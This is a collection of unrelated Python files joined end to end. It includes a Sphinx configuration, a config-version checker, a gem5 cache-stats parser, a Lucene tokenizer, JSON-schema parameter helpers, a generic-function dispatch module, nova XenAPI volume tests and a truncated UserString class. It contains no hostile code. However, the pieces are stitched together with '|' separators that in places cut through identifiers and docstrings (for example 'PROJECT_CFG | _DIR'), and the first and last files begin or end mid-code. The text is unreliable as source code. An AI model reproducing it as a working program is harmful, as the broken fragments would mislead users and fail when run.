return func
@xmltag
def render_tag(self, name):
return name
def test_decorators_can_change_a_function_output(self):
self.assertEqual(__, self.render_tag('llama'))
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Winton Kafka Streams Python documentation build configuration file, created by
# sphinx-quickstart on Tue May 16 21:00:14 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Get the project root dir
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import winton_kafka_streams
from mock import MagicMock
class Mock(MagicMock):
@classmethod
def __getattr__(cls, name):
return MagicMock()
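# Mock out the compiled confluent_kafka modules below so Sphinx autodoc can
# import the package even on machines where they are not installed.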
MOCK_MODULES = ['confluent_kafka', 'confluent_kafka.cimpl', 'confluent_kafka.avro']
sys.modules.update((mod_name, Mock()) for mod_name in MOCK_MODULES)
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'Winton Kafka Streams Python'
copyright = '2017, Winton Group'
author = 'Winton Group'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
from setuptools_scm import get_version
version = release = get_version(root='..')
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'WintonKafkaStreamsPythondoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
    # 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'WintonKafkaStreamsPython.tex', 'Winton Kafka Streams Python Documentation',
'Winton Group', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'wintonkafkastreamspython', 'Winton Kafka Streams Python Documentation',
[author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'WintonKafkaStreamsPython', 'Winton Kafka Streams Python Documentation',
author, 'WintonKafkaStreamsPython', 'One line description of project.',
'Miscellaneous'),
]
|
"""
Project Configuration Importer
Handles importing the project configuration from a separate location
and validates the version against the specified expected version.
NOTE: If you update this file or any others in scripts and require a
NEW variable in project_cfg, then you need to UPDATE THE EXPECTED_CFG_VERSION
That way, if someone tries to use the new scripts with an old cfg, they'll
get a warning.
"""
import importlib
import os
import sys
PROJECT_CFG_DIR = os.path.realpath(os.path.dirname(__file__) + "/../../cfg/")
PROJECT_CFG_NAME = "project_cfg"
EXPECTED_CFG_VERSION = 1.1
def get_project_cfg():
""" |
Returns the project configuration module
"""
sys.path.append(PROJECT_CFG_DIR)
try:
project_cfg_module = importlib.import_module(PROJECT_CFG_NAME)
    except ImportError:
raise FileNotFoundError("\n\n================================= ERROR ========================================"
"\nUnable to import project configuration: " + PROJECT_CFG | _DIR + "/" + PROJECT_CFG_NAME + ".py"
"\n================================================================================\n")
_verify_correct_version(project_cfg_module)
return project_cfg_module
def _verify_correct_version(project_cfg_module):
is_correct_version = False
if project_cfg_module.__CFG_VERSION__ == EXPECTED_CFG_VERSION:
is_correct_version = True
else:
raise Exception("\n\n================================= ERROR ========================================"
"\nIncorrect project configuration version: " + str(project_cfg_module.__CFG_VERSION__) +
"\n Development environment expected: " + str(EXPECTED_CFG_VERSION) +
"\n================================================================================\n")
return is_correct_version
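# For reference, a minimal sketch of the cfg/project_cfg.py file this
# importer expects; __CFG_VERSION__ is the only name the code above reads,
# any other settings are project-specific:
#     __CFG_VERSION__ = 1.1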
|
#!/usr/bin/env python
import sys
import re
import os
inFilename = sys.argv[1]
if os.path.isfile(inFilename):
namelength = inFilename.rfind(".")
name = inFilename[0:namelength]
exten = inFilename[namelength:]
outFilename = name+"-cachecmp"+exten
print "inFilename:", inFilename
print "outFilename:", outFilename
fpRead = open(inFilename, "r")
fpWrite = open(outFilename, "w+")
dtbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.dtb.walker).* ([0-9]+)')
dtbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.dtb.walker).* ([0-9]+)')
itbwalker1Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus0.itb.walker).* ([0-9]+)')
itbwalker2Pattern = re.compile(r'.*(l2.overall_hits::switch_cpus1.itb.walker).* ([0-9]+)')
overallhitsPattern = re.compile(r'.*(l2.overall_hits::total).* ([0-9]+)')
cachehitsPattern = re.compile(r'.*(l2.cachehits).* ([0-9]+)')
threadbeginPattern = re.compile(r'.*Begin Simulation Statistics.*')
threadendPattern =re.compile(r'.*End Simulation Statistics.*')
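    # Illustrative gem5 stats lines these patterns are written against (spacing
    # and prefixes invented; each regex only needs the stat name plus a
    # trailing integer):
    #   system.l2.overall_hits::switch_cpus0.dtb.walker        123
    #   system.l2.overall_hits::total                         4567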
lines = fpRead.readline()
while lines:
threadbeginmatch = threadbeginPattern.match(lines)
if threadbeginmatch:
dtbwalker1=0
itbwalker1=0
dtbwalker2=0
itbwalker2=0
overallhits=0
cachehits=0
gem5hits=0
ratio = 0
threadlines = fpRead.readline()
while threadlines:
dtbwalker1match = dtbwalker1Pattern.search(threadlines)
itbwalker1match = itbwalker1Pattern.search(threadlines)
dtbwalker2match = dtbwalker2Pattern.search(threadlines)
itbwalker2match = itbwalker2Pattern.search(threadlines)
overallhitsmatch = overallhitsPattern.search(threadlines)
cachehitsmatch = cachehitsPattern.search(threadlines)
threadendmatch = threadendPattern.match(threadlines)
if dtbwalker1match:
dtbwalker1=int(dtbwalker1match.group(2))
if itbwalker1match:
                itbwalker1=int(itbwalker1match.group(2))
if dtbwalker2match:
dtbwalker2=int(dtbwalker2match.group(2))
if itbwalker2match:
itbwalker2=int(itbwalker2match.group(2))
if overallhitsmatch:
overallhits=int(overallhitsmatch.group(2))
if cachehitsmatch:
cachehits=int(cachehitsmatch.group(2))
if threadendmatch:
gem5hits=overallhits-(dtbwalker1+dtbwalker2+itbwalker1+itbwalker2)
absval = abs(gem5hits-cachehits)
                if gem5hits!=0:
ratio=(absval/float(gem5hits))*100
else:
ratio=float(0)
fpWrite.write("gem5hit %d " % gem5hits)
fpWrite.write("cachehit %d " % cachehits)
fpWrite.write("ratio %.2f%%" % ratio)
fpWrite.write("\n")
break
threadlines = fpRead.readline()
lines = fpRead.readline()
fpRead.close()
fpWrite.close()
###############################################################################
##
## Copyright (C) 2006-2011, University of Utah.
## All rights reserved.
## Contact: contact@vistrails.org
##
## This file is part of VisTrails.
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are met:
##
## - Redistributions of source code must retain the above copyright notice,
## this list of conditions and the following disclaimer.
## - Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in the
## documentation and/or other materials provided with the distribution.
## - Neither the name of the University of Utah nor the names of its
## contributors may be used to endorse or promote products derived from
## this software without specific prior written permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
## AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
## THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
## PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
## CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
## EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
## PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
## OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
## WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
## OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF
## ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
##
###############################################################################
import re
from lucene import *
import lucene
dir(lucene)
class vistrailAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = vistrailFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
class stemmingAnalyzer(PythonAnalyzer):
def tokenStream(self, fieldName, reader):
result = StandardTokenizer(reader)
result = StandardFilter(result)
result = LowerCaseFilter(result)
result = PorterStemFilter(result)
result = StopFilter(result, StopAnalyzer.ENGLISH_STOP_WORDS)
return result
# patterns for splitting words into substrings
patterns = [
# 32 char md5 sums
"[a-f0-9]{32}",
# '2D', '3D'
"2D", "3D",
# words beginning with capital letters
"[A-Z][a-z]+",
# capital letter sequence ending with a word that begins with a capital letter
"[A-Z]*(?=[A-Z][a-z])",
# capital letter sequence
"[A-Z]{2,}",
# non-capital letter sequence
"[a-z]{2,}" ]
splitPattern = re.compile("|".join(patterns))
class vistrailFilter(PythonTokenFilter):
TOKEN_TYPE_PART = "text"
def __init__(self, input):
super(vistrailFilter, self).__init__(input)
self.input = input
self.parts = [] # parts found for the current token
self.current = None
def next(self):
if self.parts:
# continue adding parts
part = self.parts.pop()
t = Token(part, self.current.startOffset(),
self.current.endOffset(), self.TOKEN_TYPE_PART)
t.setPositionIncrement(0)
return t
else:
# find parts
self.current = self.input.next()
if self.current is None:
return None
text = str(self.current.termText())
pattern = splitPattern.findall(text)
# remove single characters and duplicates
pattern = set([p for p in pattern if len(p)>1 and p != text])
# if len(pattern) > 0:
# print "vistrailFilter", text, "-->",','.join(pattern)
self.parts = pattern
return self.current
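# Illustration (input invented) of how splitPattern decomposes a camel-case
# token; vistrailFilter then emits these parts at the same position as the
# original token so searches can match either form:
#   splitPattern.findall("RenderWidget")  ->  ['Render', 'Widget']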
"""Various miscellaneous functions to make code easier to read & write."""
import collections.abc
import copy
import functools
import inspect
import logging
import urllib.parse
import jsonpointer
import jsonschema
_logger = logging.getLogger("holocron")
def resolve_json_references(value, context, keep_unknown=True):
def _do_resolve(node):
node = copy.copy(node)
if isinstance(node, collections.abc.Mapping) and "$ref" in node:
uri, fragment = urllib.parse.urldefrag(node["$ref"])
try:
return jsonpointer.resolve_pointer(context[uri], fragment)
except KeyError:
if keep_unknown:
return node
raise
elif isinstance(node, collections.abc.Mapping):
for k, v in node.items():
node[k] = _do_resolve(v)
elif isinstance(node, collections.abc.Sequence) and not isinstance(node, str):
if not isinstance(node, collections.abc.MutableSequence):
node = list(node)
            for i in range(len(node)):
node[i] = _do_resolve(node[i])
return node
return _do_resolve(value)
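# A minimal sketch of resolve_json_references (inputs invented; the "metadata:"
# context key mirrors the one used by the decorator below):
#   context = {"metadata:": {"site": {"url": "https://example.test"}}}
#   value = {"link": {"$ref": "metadata:#/site/url"}}
#   resolve_json_references(value, context)
#   # -> {"link": "https://example.test"}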
class parameters:
def __init__(self, *, fallback=None, jsonschema=None):
self._fallback = fallback or {}
self._jsonschema = jsonschema
def __call__(self, fn):
@functools.wraps(fn)
        def wrapper(app, *args, **kwargs):
signature = inspect.signature(fn)
arguments = signature.bind_partial(app, *args, **kwargs).arguments
# First two arguments always are an application instance and a
# stream of items to process. Since they are passed by Holocron
# core as positional arguments, there's no real need to check their
# schema, so we strip them away.
arguments = dict(list(arguments.items())[2:])
parameters = dict(list(signature.parameters.items())[2:])
# If some parameter has not been passed, a value from a fallback
# must be used instead (if any).
for param in parameters:
if param not in arguments:
try:
value = resolve_json_references(
{"$ref": self._fallback[param]},
{"metadata:": app.metadata},
)
except (jsonpointer.JsonPointerException, KeyError):
continue
# We need to save resolved value in both arguments and
# kwargs mappings, because the former is used to *validate*
# passed arguments, and the latter to supply a value from a
# fallback.
arguments[param] = kwargs[param] = value
if self._jsonschema:
try:
format_checker = jsonschema.FormatChecker()
@format_checker.checks("encoding", (LookupError,))
def is_encoding(value):
if isinstance(value, str):
import codecs
return codecs.lookup(value)
@format_checker.checks("timezone", ())
def is_timezone(value):
if isinstance(value, str):
import dateutil.tz
return dateutil.tz.gettz(value)
@format_checker.checks("path", (TypeError,))
def is_path(value):
if isinstance(value, str):
import pathlib
return pathlib.Path(value)
jsonschema.validate(
arguments,
self._jsonschema,
format_checker=format_checker,
)
except jsonschema.exceptions.ValidationError as exc:
message = exc.message
if exc.absolute_path:
message = f"{'.'.join(exc.absolute_path)}: {exc.message}"
raise ValueError(message)
return fn(app, *args, **kwargs)
return wrapper
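# Hedged sketch of applying the decorator above; the processor name, schema and
# fallback pointer are invented. The first two positional parameters (app and
# the item stream) are stripped before validation, as noted in wrapper().
#
# @parameters(
#     fallback={"encoding": "metadata:#/encoding"},
#     jsonschema={"type": "object",
#                 "properties": {"encoding": {"format": "encoding"}}},
# )
# def process(app, items, *, encoding="UTF-8"):
#     ...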
# -*- mode: python -*-
from .combinations import STANDARD_METHOD_COMBINATION
from .specializers import specializer, ROOT_SPECIALIZER
from . import util
from .cache import NoCachePolicy, LRU, TypeCachePolicy
import threading
import inspect
import warnings
try:
from ._py_clos import GenericFunction as GenericFunctionBase
except ImportError:
class GenericFunctionBase:
def __call__(self, *args, **kwargs):
return self.call_slow_path(args, kwargs)
        def initialize_cache(self, map, size, should_grow=False):
            # signature matches the three-argument call in initialize_c_cache();
            # the pure-Python fallback has no native cache to set up
            pass
class GenericFunction(GenericFunctionBase):
def __init__(self, name):
self._name = name
self._method_combination = STANDARD_METHOD_COMBINATION
self._methods = []
self._specialized_on = []
self._cache_policies = []
self._lock = threading.Lock()
self.clear_cache()
def redefine(self, method_combination=None):
if method_combination is not None:
            self._method_combination = method_combination
self.clear_cache()
def get_cache_size(self):
return len(self._methods) * 4
def cache_should_grow(self):
for i in self._cache_policies:
if i != TypeCachePolicy:
return False
return True
def clear_cache(self):
if self._cache_policies is None:
self._cache = None
else:
for i in self._cache_policies:
if i != TypeCachePolicy:
self._cache = LRU(self.get_cache_size())
return
self._cache = {}
# the idea is that number of possible types is clearly bounded
# so limiting the cache size is unnecessary
def rebuild_specialized_on(self):
maxlen = max((len(i.specializers) for i in self._methods))
bitmap = [False] * maxlen
for i in self._methods:
for j in i.specialized_on:
bitmap[j] = True
self._specialized_on = [idx for idx, i in enumerate(bitmap) if i]
def rebuild_cache_policies(self):
arglen = max((len(i.specializers) for i in self._methods))
spec_count = len(self._specialized_on)
        cps = [[] for _ in range(spec_count)]  # independent lists; [[]] * n would alias a single list
for i in self._methods:
for idx, j in enumerate(self._specialized_on):
if j >= len(i.specializers):
continue
spec = i.specializers[j]
if spec is None:
continue
cps[idx].append(spec.cache_policy)
cps = [util.common_superclass(*i) for i in cps]
        for i in cps:
            if i is NoCachePolicy:
                # any NoCachePolicy disables caching entirely; without this
                # return, the assignment below would clobber the None
                self._cache_policies = None
                return
        self._cache_policies = cps
def get_cache_map(self):
maxlen = max((len(i.specializers) for i in self._methods))
key = [b"_"] * maxlen
for idx, cp in zip(self._specialized_on, self._cache_policies):
if not hasattr(cp, "c_cache_key"):
return None
key[idx] = cp.c_cache_key
return b"".join(key).rstrip(b'_')
def initialize_c_cache(self):
cm = self.get_cache_map()
if not cm:
self.initialize_cache(b"", 0, False)
else:
self.initialize_cache(cm,
self.get_cache_size(),
self.cache_should_grow())
def add_method(self, method):
with self._lock:
self._methods.append(method)
self.rebuild_specialized_on()
self.rebuild_cache_policies()
self.initialize_c_cache()
self.clear_cache()
def get_cache_key(self, args):
return tuple((cp.get_cache_key(args[self._specialized_on[idx]])
for idx, cp in enumerate(self._cache_policies)))
def get_applicable_methods(self, args):
return sorted((i for i in self._methods if i.matches(args)),
key=lambda i: i.sort_key(args))
def get_effective_method(self, args):
with self._lock:
methods = self.get_applicable_methods(args)
return self._method_combination.compute_effective_method(methods)
def call_slow_path(self, args, kwargs={}):
if self._cache is not None:
ck = self.get_cache_key(args)
if ck in self._cache:
return self._cache[ck](*args, **kwargs)
effective_method = self.get_effective_method(args)
if self._cache is not None:
self._cache[ck] = effective_method
return effective_method(*args, **kwargs)
class Method:
__slots__ = ["proc", "specializers", "qualifiers", "next_method_arg"]
def __init__(self, proc,
specializers=[],
qualifiers=[],
next_method_arg=None):
self.proc = proc
self.specializers = specializers
self.qualifiers = qualifiers
self.next_method_arg = next_method_arg
@property
def specialized_on(self):
        return [idx for idx, i in enumerate(self.specializers) if i is not None]
def matches(self, args):
for idx, i in enumerate(self.specializers):
if i is None:
continue
if not i.matches(args[idx]):
return False
return True
def sort_key(self, args):
res = []
for idx, i in enumerate(self.specializers):
if idx >= len(args):
break
if i is None:
i = ROOT_SPECIALIZER
res.append(i.sort_key(args[idx]))
return res
@classmethod
def from_annotated_function(cls, proc, qualifiers=[]):
argspec = inspect.getfullargspec(proc)
arg_names = argspec.args[:len(argspec.args) - len(argspec.defaults or [])]
anno = proc.__annotations__
specializers = [(specializer(anno[i]) if i in anno else None)
for i in arg_names]
return cls(proc,
specializers=specializers,
qualifiers=qualifiers,
next_method_arg=("next_method"
if "next_method" in argspec.args else None))
def __call__(self, *args, **kwargs):
return self.callable(*args, **kwargs)
@property
def callable(self):
return self.callable_with_next_method()
def callable_with_next_method(self, next_method=None):
if self.next_method_arg:
def wrapper(*args, **kwargs):
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
return wrapper
else:
return self.proc
def call_method(self, args, kwargs, next_method=None):
if self.next_method_arg:
kw = {self.next_method_arg: next_method}
kw.update(kwargs)
return self.proc(*args, **kw)
else:
return self.proc(*args, **kwargs)
def defgeneric(name, **kwargs):
gf = GenericFunction(name)
gf.redefine(**kwargs)
return gf
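# Hedged usage sketch composing the pieces above (the `describe` generic and
# its method are invented; `specializer(int)` is assumed to map a type
# annotation onto a matching specializer, per Method.from_annotated_function):
#
# describe = defgeneric("describe")
# def _describe_int(x: int):
#     return "int: %r" % (x,)
# describe.add_method(Method.from_annotated_function(_describe_int))
# describe(42)  # dispatches through the cache / effective-method machinery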
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2012 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import collections
from nova import test
from nova.tests.xenapi import stubs
from nova.virt.xenapi import volumeops
class VolumeAttachTestCase(test.TestCase):
def test_detach_volume_call(self):
registered_calls = []
def regcall(label):
def side_effect(*args, **kwargs):
registered_calls.append(label)
return side_effect
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(volumeops.vm_utils, 'lookup')
self.mox.StubOutWithMock(volumeops.vm_utils, 'find_vbd_by_number')
self.mox.StubOutWithMock(volumeops.vm_utils, 'is_vm_shutdown')
self.mox.StubOutWithMock(volumeops.vm_utils, 'unplug_vbd')
self.mox.StubOutWithMock(volumeops.vm_utils, 'destroy_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
self.mox.StubOutWithMock(volumeops.volume_utils, 'find_sr_from_vbd')
self.mox.StubOutWithMock(volumeops.volume_utils, 'purge_sr')
volumeops.vm_utils.lookup('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
volumeops.vm_utils.find_vbd_by_number(
'session', 'vmref', 'devnumber').AndReturn('vbdref')
volumeops.vm_utils.is_vm_shutdown('session', 'vmref').AndReturn(
False)
volumeops.vm_utils.unplug_vbd('session', 'vbdref')
volumeops.vm_utils.destroy_vbd('session', 'vbdref').WithSideEffects(
regcall('destroy_vbd'))
volumeops.volume_utils.find_sr_from_vbd(
'session', 'vbdref').WithSideEffects(
regcall('find_sr_from_vbd')).AndReturn('srref')
volumeops.volume_utils.purge_sr('session', 'srref')
self.mox.ReplayAll()
ops.detach_volume(
dict(driver_volume_type='iscsi', data='conn_data'),
'instance_1', 'mountpoint')
self.assertEquals(
['find_sr_from_vbd', 'destroy_vbd'], registered_calls)
def test_attach_volume_call(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=True).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
        ops.attach_volume(
connection_info,
'instance_1', 'mountpoint')
    def test_attach_volume_no_hotplug(self):
ops = volumeops.VolumeOps('session')
self.mox.StubOutWithMock(ops, '_connect_volume')
self.mox.StubOutWithMock(volumeops.vm_utils, 'vm_ref_or_raise')
self.mox.StubOutWithMock(volumeops.volume_utils, 'get_device_number')
connection_info = dict(driver_volume_type='iscsi', data='conn_data')
volumeops.vm_utils.vm_ref_or_raise('session', 'instance_1').AndReturn(
'vmref')
volumeops.volume_utils.get_device_number('mountpoint').AndReturn(
'devnumber')
ops._connect_volume(
connection_info, 'devnumber', 'instance_1', 'vmref',
hotplug=False).AndReturn(('sruuid', 'vdiuuid'))
self.mox.ReplayAll()
ops.attach_volume(
connection_info,
'instance_1', 'mountpoint', hotplug=False)
def test_connect_volume_no_hotplug(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
instance_name = 'instance_1'
sr_uuid = '1'
sr_label = 'Disk-for:%s' % instance_name
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
vm_ref = 'vm_ref'
dev_number = 1
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.StubOutWithMock(volumeops.vm_utils, 'create_vbd')
volumeops.vm_utils.create_vbd(
session, vm_ref, vdi_ref, dev_number,
bootable=False, osvol=True).AndReturn(vbd_ref)
self.mox.ReplayAll()
ops._connect_volume(connection_info, dev_number, instance_name,
vm_ref, hotplug=False)
self.assertEquals(False, called['VBD.plug'])
def test_connect_volume(self):
session = stubs.FakeSessionForVolumeTests('fake_uri')
ops = volumeops.VolumeOps(session)
sr_uuid = '1'
sr_label = 'Disk-for:None'
sr_params = ''
sr_ref = 'sr_ref'
vdi_uuid = '2'
vdi_ref = 'vdi_ref'
vbd_ref = 'vbd_ref'
connection_data = {'vdi_uuid': vdi_uuid}
connection_info = {'data': connection_data,
'driver_volume_type': 'iscsi'}
called = collections.defaultdict(bool)
def fake_call_xenapi(self, method, *args, **kwargs):
called[method] = True
self.stubs.Set(ops._session, 'call_xenapi', fake_call_xenapi)
self.mox.StubOutWithMock(volumeops.volume_utils, 'parse_sr_info')
volumeops.volume_utils.parse_sr_info(
connection_data, sr_label).AndReturn(
tuple([sr_uuid, sr_label, sr_params]))
self.mox.StubOutWithMock(
volumeops.volume_utils, 'find_sr_by_uuid')
volumeops.volume_utils.find_sr_by_uuid(session, sr_uuid).AndReturn(
None)
self.mox.StubOutWithMock(
volumeops.volume_utils, 'introduce_sr')
volumeops.volume_utils.introduce_sr(
session, sr_uuid, sr_label, sr_params).AndReturn(sr_ref)
self.mox.StubOutWithMock(volumeops.volume_utils, 'introduce_vdi')
volumeops.volume_utils.introduce_vdi(
session, sr_ref, vdi_uuid=vdi_uuid).AndReturn(vdi_ref)
self.mox.ReplayAll()
ops.connect_volume(connection_info)
self.assertEquals(False, called['VBD.plug'])
#!/usr/bin/env python
## vim:ts=4:et:nowrap
"""A user-defined wrapper around string objects
Note: string objects have grown methods in Python 1.6
This module requires Python 1.6 or later.
"""
from types import StringType, UnicodeType
import sys
__all__ = ["UserString","MutableString"]
class UserString:
def __init__(self, seq):
if isinstance(seq, StringType) or isinstance(seq, UnicodeType):
self.data = seq
elif isinstance(seq, UserString):
self.data = seq.data[:]
else:
self.data = str(seq)
def __str__(self): return str(self.data)
def __repr__(self): return repr(self.data)
def __int__(self): return int(self.data)
def __long__(self): return long(self.data)
def __float__(self): return float(self.data)
def __complex__(self): return complex(self.data)
def __hash__(self): return hash(self.data)
def __cmp__(self, string):
if isinstance(string, UserString):
return cmp(self.data, string.data)
else:
return cmp(self.data, string)
def __contains__(self, char):
return char in self.data
def __len__(self): return len(self.data)
def __getitem__(self, index): return self.__class__(self.data[index])
def __getslice__(self, start, end):
start = max(start, 0); end = max(end, 0)
return self.__class__(self.data[start:end])
def __add__(self, other):
if isinstance(other, UserString):
return self.__class__(self.data + other.data)
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(self.data + other)
else:
return self.__class__(self.data + str(other))
def __radd__(self, other):
if isinstance(other, StringType) or isinstance(other, UnicodeType):
return self.__class__(other + self.data)
else:
return self.__class__(str(other) + self.data)
def __iadd__(self, other):
if isinstance(other, UserString):
self.data += other.data
elif isinstance(other, StringType) or isinstance(other, UnicodeType):
self.data += other
else:
self.data += str(other)
return self
def __mul__(self, n):
return self.__class__(self.data*n)
__rmul__ = __mul__
def __imul__(self, n):
self.data *= n
return self
# the following methods are defined in alphabetical order:
def capitalize(self): return self.__class__(self.data.capitalize())
def center(self, width): return self.__class__(self.data.center(width))
def count(self, sub, start=0, end=sys.maxint):
return self.data.count(sub, start, end)
def encode(self, encoding=None, errors=None): # XXX improve this?
if encoding:
if errors:
return self.__class__(self.data.encode(encoding, errors))
else:
return self.__class__(self.data.encode(encoding))
else:
return self.__class__(self.data.encode())
def endswith(self, suffix, start=0, end=sys.maxint):
return self.data.endswith(suffix, start, end)
def expandtabs(self, tabsize=8):
return self.__class__(self.data.expandtabs(tabsize))
def find(self, sub, start=0, end=sys.maxint):
return self.data.find(sub, start, end)
def index(self, sub, start=0, end=sys.maxint):
return self.data.index(sub, start, end)
def isalpha(self): return self.data.isalpha()
def isalnum(self): return self.data.isalnum()
def isdecimal(self): return self.data.isdecimal()
def isdigit(self): return self.data.isdigit()
def islower(self): return self.data.islower()
def isnumeric(self): return self.data.isnumeric()
def isspace(self): return self.data.isspace()
def istitle(self): return self.data.istitle()
def isupper(self): return self.data.isupper()
def join(self, seq): return self.data.join(seq)
def ljust(self, width): return self.__class__(self.data.ljust(width))
def lower(self): return self.__class__(self.data.lower())
def lstrip(self): return self.__class__(self.data.lstrip())
def replace(self, old, new, maxsplit=-1):
return self.__class__(self.data.replace(old, new, maxsplit))
def rfind(self, sub, start=0, end=sys.maxint):
return self.data.rfind(sub, start, end)
